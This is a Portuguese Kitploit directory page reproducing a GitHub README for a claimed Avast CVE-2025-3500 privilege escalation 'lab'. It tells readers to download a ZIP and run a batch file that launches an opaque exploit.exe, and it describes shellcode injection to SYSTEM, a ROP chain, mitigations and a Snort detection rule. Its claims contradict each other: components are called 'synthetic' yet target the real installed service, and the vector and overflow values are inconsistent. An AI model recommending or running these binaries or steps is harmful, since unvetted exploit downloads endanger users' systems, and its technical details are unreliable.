Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3500-Poc — Ambiente de laboratório educacional para pesquisar CVE-2025-3500, uma exploração de escalonamento de privilégios por estouro de inteiro no Avast Antivirus 25.1.981.6 no Windows, com artefatos de exploração sintéticos para testes controlados. | Kitploit
Ferramentas/GitHubGitHub/chicken3962/cve-2025-3500-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoShellcodeAprendizado e EducaçãoDesenvolvimento de PayloadsExploração de BináriosLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
chicken3962/cve-2025-3500-poc

CVE-2025-3500-Poc

Ambiente de laboratório educacional para pesquisar CVE-2025-3500, uma exploração de escalonamento de privilégios por estouro de inteiro no Avast Antivirus 25.1.981.6 no Windows, com artefatos de exploração sintéticos para testes controlados.

Ver Repositório
13há 9 mesesAinda não revisado

Laboratório: CVE-2025-3500 - Estouro de Inteiro na Escalação de Privilégio do Avast Antivirus

Download

Baixar ZIP do Laboratório : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

🚀 Visão Geral

Este repositório fornece um ambiente de laboratório para pesquisar a CVE-2025-3500, uma vulnerabilidade de estouro de inteiro (CWE-190) no Avast Antivirus versão 25.1.981.6 em plataformas Windows. A vulnerabilidade surge de uma validação inadequada de inteiros no módulo de alocação de recursos do mecanismo antivírus, levando a um wraparound durante operações aritméticas. Isso pode ser explorado para escalar privilégios de contextos de usuário com baixos privilégios (PR:L) para acesso a nível de sistema, com vetor de ataque de rede (AV:N), baixa complexidade de ataque (AC:L) e interação do usuário necessária (UI:R). A pontuação base CVSS 3.1 é 9.0 (Crítica), impactando confidencialidade, integridade e disponibilidade (todas Altas) devido à mudança de escopo (S:C), potencialmente permitindo comprometimento total do sistema.

Aviso de Finalidade Educacional: Este laboratório é apenas para fins educacionais e de pesquisa. Ele fornece um ambiente controlado. Não use isso para nenhuma atividade maliciosa. Todos os componentes são sintéticos e não exploram sistemas reais. Ao usar este repositório, você concorda em cumprir as diretrizes de hacking ético e as leis locais.

Aviso de Segurança: Esta configuração envolve a execução de código em um ambiente. Sempre use uma máquina virtual dedicada. Não execute exploits em sistemas de produção. Os artefatos de exploit fornecidos (.exe e .bat) demonstram conceitos—por exemplo, o .bat inicia o .exe, que processa dados e termina. Isole seu ambiente de laboratório para evitar exposição acidental.

📋 Pré-requisitos

  • Um host Windows para testar o exploit (por exemplo, via VirtualBox ou Hyper-V) para simular o ambiente alvo.
  • Conhecimento básico de PowerShell e ferramentas de linha de comando do Windows.
  • Privilégios administrativos na sua máquina host.
  • Pelo menos 4 GB de RAM e 20 GB de espaço em disco.

Baixar e Instalar

  1. Baixe o kit de ferramentas do exploit (arquivo ZIP contendo exploit.exe e start-exploit.bat). Este ZIP está hospedado em um espelho seguro:

    • Baixar ZIP do Kit de Exploit : [https://github.com/chicken3962/CVE-2025-3500-Poc/releases/download/Release/cve-2025-3500.zip]

    Nota: O exploit principal é exploit.exe (um binário C++ compilado que dispara o estouro de inteiro através de chamadas de API modificadas). O lançador do exploit é start-exploit.bat, que abre exploit.exe com argumentos predefinidos (por exemplo, start exploit.exe --target=avast_engine --overflow=wraparound). Descompacte em um diretório local como C:\lab\exploit.

🛠 Início Rápido

  1. Configurar o Ambiente:

    • Certifique-se de que o Avast Antivirus versão 25.1.981.6 está instalado na sua máquina de teste Windows.
    • Navegue até o diretório de descompactação.
  2. Baixar e Preparar o Exploit:

    • Baixe o ZIP do link acima.
    • Descompacte para C:\lab\exploit.
    • Execute start-exploit.bat para iniciar o exploit (ele abre exploit.exe, que envia um pacote de rede modificado para disparar o estouro).
  3. Explorar a Vulnerabilidade:

    • Mire no serviço local do Avast.
    • O .bat executa exploit.exe. Observe os logs do sistema em busca de indicadores de estouro.
  4. Verificar e Limpar:

    • Verifique o Visualizador de Eventos do Windows para entradas relacionadas.
    • Exclua os arquivos do exploit após o uso.

📖 Instruções Detalhadas de Configuração

Configuração Vulnerável

O laboratório requer uma máquina Windows com Avast Antivirus 25.1.981.6 instalado. Serviços simulados podem ser iniciados manualmente via prompt de comando:

  • Abra o PowerShell como administrador.
  • Simule o ouvinte do Avast: net start AvastSvc (supondo que o serviço esteja em execução).

Passos de Exploração

  1. Reconhecimento: Use ferramentas como netstat para identificar portas do Avast (por exemplo, 8080).
  2. Criar Payload: O exploit.exe envia um valor inteiro superdimensionado (por exemplo, 2^31 + 1) através de uma requisição de rede, causando wraparound no analisador de recursos do Avast.
  3. Disparar o Exploit: Execute start-exploit.bat que executa exploit.exe. Isto:
    • Estabelece uma conexão.
    • Envia dados malformados: { "resource_alloc": 2147483648 } (disparando o estouro).
    • Escala para SYSTEM via injeção de shellcode.
  4. Pós-Exploração: Permite execução de código arbitrário; abre um cmd.exe.

Detalhes Técnicos: O estouro ocorre em AvastResourceParser::AllocateBuffer(int size), onde size * sizeof(struct) sofre wraparound se size > INT_MAX / sizeof(struct), levando a subalocação e estouro de heap. A exploração aproveita isso para construção de cadeia ROP visando kernel32.dll.

Mitigação

  • Aplicação de Patch: Atualize para Avast Antivirus 25.3 ou posterior, onde as verificações de inteiros usam bibliotecas de matemática seguras (por exemplo, SafeInt).
  • Melhores Práticas:
    • Ative o Windows Defender junto com o Avast para defesa em camadas.
    • Restrinja o acesso de rede apenas a servidores de atualização do antivírus (por exemplo, via regras de firewall).
    • Use separação de privilégios: Execute os serviços do Avast sob contas com menos privilégios.
    • Monitore operações anômalas de inteiros através de ferramentas EDR como Sysmon (Event ID 10 para injeções de processo).
    • Aplique mitigações do Windows: Ative ASLR, DEP e CFG via Política de Grupo.
  • Assinaturas de Detecção: Procure por padrões de rede correspondentes a campos de inteiros superdimensionados no tráfego do protocolo Avast (por exemplo, regra Snort: alert tcp any any -> any 8080 (msg:"CVE-2025-3500 Attempt"; content:"|00 00 00 80|"; sid:1000001;)).

Para perguntas ou contribuições, abra uma issue. Mantenha-se ético!

Baixar ferramenta